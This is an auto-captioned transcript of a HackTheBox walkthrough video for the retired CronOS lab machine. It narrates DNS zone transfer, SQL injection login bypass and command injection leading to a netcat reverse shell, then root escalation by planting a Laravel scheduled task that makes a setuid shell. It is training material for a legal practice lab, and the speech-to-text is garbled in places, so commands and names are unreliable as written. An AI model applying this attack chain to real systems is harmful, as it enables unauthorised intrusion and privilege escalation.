HackTheBox - CronOS

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey guys the hack the box team has retired cron OS which happens to be one of my favorite boxes because it's not really that challenging you know exactly what to do at every step but every step requires you to sink a little bit which is awesome this is it let's jump into the box like all boxes we have to start with an mapping so an map - SC safe scripts SV enumerate versions Oh a I'll put all formats give it a name like n map and then the IP address which is 10 10 10 13 I'm not going to run this because it takes time instead I have all the output saves so it's just less that file and map add map and we can see what is listening we have port 22 SSH 53 which is DNS odd that's on TCP normally DNS is UDP and then port 80 which is HTTP we know most about HTTP so that's the first thing I'm going to go to so 10 10 10 13 we get the Apache - Ubuntu default page when you see this Apache default page generally there's a miss configuration somewhere or you're just not going down the right route so what I'm going to do is to an intercept on refresh the page and then change this host value to be the hostname of the box which is cron oh sh t be you know that from the admin panel of hack the box so when we Ford this request and then go back to our Firefox we do see chrono s and if this didn't work then I'd fire up do Buster against the IP address and see if there's any hidden files or things like that going to these URLs we see dot-coms flash docs for laravel this is outside the hack the Box domain so out of scope or a cast outside the domain news again the linking me off of 10 10 10 13 or chrono SH TB which means they're out of scope I don't want to try to attack laravel comm which is a PHP framework glancing at the source I don't see anything of so what I'm going to do now is edit my host file to put 10 10 10 13 and cron Oh sh t be in it save that and now I don't have to edit the packet I can just go to it by domain name so I'm going to open up do a buster and on my target URL let's put this at I guess that's fine 50 some threads and then we have to go to user share wordless dub and I want go blaster I think Doe buster has been better list I'll do directory list 2.3 medium I disabled be recursive because I like to finish some time today and this should be fine I'm going to start this up and let this run in the background while I do some other things so we did see that DNS was listening on this box so we're going to do nslookup and change your server to be 10 10 10 13 and we can do the IP address and we see that resolves to NS 1 chrono sh t b if you wanted to you could also just do chrono sth DB and you see it's hostname that way just in case you did have access to the web portal and got the host name that way the next thing i check is to do dns zone transfer records to see if it's configured where we can do a zone transfer and the reason why I'm trying this first is because zone transfers required DNS TCP there what DNS server is used to transfer entire zones to go like master slave configurations I have a horrible time explaining this right now but let's just try it so dig axfr is the command 10 10 10 13 and we're going to transfer the chrono sh t b-zone hope this is correct and it is so we see a few more subdomains we have admin Cano s and s 1 which we saw earlier w w and then just the regular default going back into der Buster do we see anything nope not really so let's edit a host file to add the new domain names OSTP and admin dot cron Oh sh t be ok save that and now we can go to the URLs www is the same NS one default Apache so HTTP Apache is not configured for NS 1 o'clock oh sh t be let's see admin and we get a user panel so let's just try admin admin admin password admin and I'm going to do I'll do it in book so you can see it because it's masking passwords submit we'll do a common SQL injection URL encode this for this off and nothing so the next thing I'm going to do is try to ask you all map this so admin admin submit copy and then create the log of a quest and we'll be able to point SQL map at this login request and I like doing it this way just because you don't have to worry about giving it a bunch of flags to change the user agent put in a post requests and data becomes really easy when you can just do SQL map - our login request super simple and then we'll let this run and just a few seconds we should get a response back but while that's going check doorbuster nothing new and it's still going because we see 13 minutes no error messages and the first thing comes back from SQL map SQL map got a 302 redirect to welcome dot PHP we try to log in send this to repeater it's not sending a redirect which means something good happened with SQL map so do we want to follow it yeah see if the post requests and the original post date new location I guess so but the key thing to look at is I guess I was doing Union just at the time but key thing to look at is we're doing user injection at this point when it detected that so while SQL maps running let us try doing something in the user so and the parameter I have to drop this request so admin doesn't matter what's there so and that parameter and we'll send a comment click Submit and we get in so the username was SQL injection and awesome so net tool we have ping and traceroute let us just try basic command injection put a semicolon Who am I click execute and see what happens and we should have done that in boat so what we'll do HTTP history get that last one I'm gonna see the response now paying we ww data so it looks like we did get command injection so we have the ping output and then wws data awesome so send this over to repeater to see what the request looks like and send it again so you can see the interesting is it will say we have command junction in the command as well so both these parameters are commanded ejected and this developer should just be shot so let us verify what we think let's just change command to be Who am I and we still get data the user we can change a date and we see yeah it is definitely doing command injection so next thing let's Google and test monkey reverse shell cheat sheet so I don't have Firefox configured to use my book certificate yet so let's do that see a save file preferences security now advanced certificates view servers authorities I think it's authorities downloads CA cert trust identify websites yep there we go now my browser is no longer complaining about burp reverse shell cheat sheet we'll try this first one that's bash so do it ifconfig and that's not SQL map did not say there is SQL injection so NC l VMT will listen on 8081 or IP is 1010 1528 so go to boot paste that command ten ten fifteen twenty eight I think yep change this to be 80 81 euro in code and I'm just pressing control you to do that quickly instead of right-clicking and doing it and we don't get anything so this one didn't work and we could just go down the line to try the second one I normally try is this one because a lot of these boxes have NC on them they just don't have the version of NC which allows you to use an argument to give a file so we can do which and see yes we do have it so do this ten ten ten fifteen twenty eight and port 8081 we go to run this that should have worked oh you're Ellen code so highlight your Ellen code go and we get a shell so first things first let's get us a real shell so Python C input PT y PT y dot spawn then - okay I'm going to background this s TTY raw - echo foreground term variable not set so let's explore and what is my term variable should just be x 2m - 256 go screen setter okay terminal screen and that's why because I'm in team ox right now so export term equal screen and now I can use clear awesome and it just don't know me that I didn't explain what I was doing what I was doing is just getting a pseudo terminal that allows me to do tab Auto completion so it's stirred off with me pressing ctrl Z to background the process then I typed s TTY raw - echo which told my terminal not the process special characters like tabs and instead just send them right on through to the next terminal which is that Python TTY session listening on the remote box and when I combine those two and lets me do those special characters but the next step is back on our local box and I'm going to rename this to be web server because that's what we're going to do we got to run a few Prison scripts to identify common ways to prevent so I have scripts and opt Linux probe ask opt is just why throw scripts and stuff I download and I try to stay organized so these are three I use when enum when X print checker and UNIX prove SSH you can just google all those and download them and do Python - mmm simple HTTP server to start up something back on this process type if config it my IP it is ten ten fifteen twenty eight and then foreground it so now I can go to dev s hm let's create got it and Dev SH M is ramdisk which means it's the server reboots all the files get deleted so I have to worry about cleaning up so W get I think - R is recursive we'll find out ten ten fifteen twenty eight forty eight thousand no is it there we go - lowercase R is recursive and I put it in a folder that's fine so now we can run these scripts so we'll start off with Lin enum is H scroll up as this goes and as I'm scrolling I noticed something really odd right now is there's a crontab that runs every minute by the user root and it's running a lower eval command which is a PHP framework that we saw earlier at the web page and schedule run so my guess would be if we can get Louisville to execute a command by sending it a scheduled task we'll be able to get code execution awesome so that's what I'm going to start my search first let's copy this and we can stop the enumeration because we have an idea what to do no schedule commands to run so now to get a trusty Google and search how to do command so let's do Louisville create schedule command little Doc's always entertaining or just Doc's are always good I don't know why I said that and then easy Louisville book calm that sounds good so the first thing it's doing scrolling what's the command once it's to run inspire not sure what inspire is okay your own commands by the mate console generator we may want to come back into this AA scheduling command this is probably what we want to do so we edit the app console colonel dot PHP file find this protected function and schedule a command so this is scheduling a command that we created up here but we can go over to the lower Bell docks just to look over to see if there's other ways we can define commands so this is defining schedules we don't care about that scheduled frequency every minute that's definitely going to be useful still searching time constraints running tasks maintenance tasks output task hooks oh did I miss something nope so go back let's see schedule command terminal shell - does this work Tizen list calling commands outside of the CLI scheduling commands scheduling terminal commands so we want to do schedule - exec composer self updates so this is running the bash command compose yourself update every day so combining these two pages we should be able to get a lower bail task created so first things first we have to find that file colonel dot PHP so we can do fine / - name and then output errors to the bin bucket shouldn't take too long to find we do see it in 4ww laravel at console colonel PHP app console kernel dot PHP that looks like what we want so we're going to go into that directory and edit it so we want to find that protected function section and right here function schedule so let's create one so it was scheduled to exec and let's see what do we want to do let's just touch flashtab hip sack and the reason I'm doing this is just to see what user I'm running under and we want to do it to every minute I think that's how it did it I guess we'll find out right this date so we have 40 seconds so let's see hourly we need open/close parentheses minute if I could type there we go okay so in about 20 seconds it should write to temp if SEC and if it's root we know we got some running commands as root man what I stumble so hard on that 53 seconds 58 seconds so LS dash L a let us hope for it sec and we do see it check and we see root awesome so we're going to go dev sh m and compile a TTY show of set UID shell so check of GCC it's not installed C is a 64-bit yes it is so we can go back to a web server we can stop this huh yeah well just trying to figure out how to stay out we organized don't mind me so documents htb and this is chrono s boxes chrono s okay so we have to create a set UID program to do that it's just a C file and main void okay then we want to set UID to 0 set G ID to 0 and then run system bin bash close this compile so GCC set UID I'll put we'll call this set poet IPSec dot slash if sec make sure it runs looks good so now we wait to send this over so again python - m simple HTTP server go back to a shell w get we can use cool cool ten ten fifteen twenty eight eight thousand if set call it it sec done so LS la it's not executable so let's make it executable and dot slash epoch good it runs so now for this program to work is we have to give it the sticky bit and change it to root or not sticky bit we have to give it to su ID bit and then change the owner to root so CD / ba okay so what we're going to do touch command to be CH own route through temp if sec and chmod four seven five five on temp hips AK the for this is the set UID bit read/write/execute read execute read execute okay and now we wait for the new minute and looks like we had just literally missed it yep so now with stuck at a waiting game for another minute for that cron door on C can I set the date 335 58 done only route can set date I was having to speed up the Kron 33 seconds left so in about 30 seconds that con will run and then we should be able to jump to route check date again so ten seconds so sleep 10 lol a and when this finishes we will have route and a second there we go and we don't oh crap I did 10 pips tech not dev s hm so now we have to go back and do that all over again cd4 level the kernel dov a so ok d 25 seconds so if we do LS - la on temp we do see the sticky bit is now set on IPSec the only problem is there's no file there zero bytes so if I hadn't made that writable by everyone chances are we wouldn't have to wait this minute again but I did not CD - if you don't know - is previous directory so dev AC gem back to console so little handy trick and now we have the sticky bit route route owns it on this so we do dot slash tip set then ID we should have been route we are not roof it ran check mount permissions Oh dev let's see where's dev there it is so Deb is actually mounted no set UID so we can't do the file there so back to waiting a minute colonel let's just see its own route we can just CP this file - slash temp and we'll just move it actually hopefully it doesn't ask to overwrite date 40 seconds left so the no set UID bit means anything in that mount can't use that set UID function so since that was set on dev and there's no like dev sh m in the mount well the net no set UID bit is set and it breaks that so it shouldn't be set on Mount on flash which is what mountain is so let's check oh that's boot sued the first step mapper here we go so this is what slash temp folds under and we don't have no set UID so this time it should work la so now we see stuff has written to that file dot slash hip sac ID and we a root so we can go in the root directory and if we wanted to read that file so hope you guys enjoyed this video take care and have a good night

Info

Channel: IppSec

Views: 65,334

Rating: undefined out of 5

Keywords: HackTheBox, HTB

Id: CYeVUmOar3I

Channel Id: undefined

Length: 28min 50sec (1730 seconds)

Published: Fri Aug 04 2017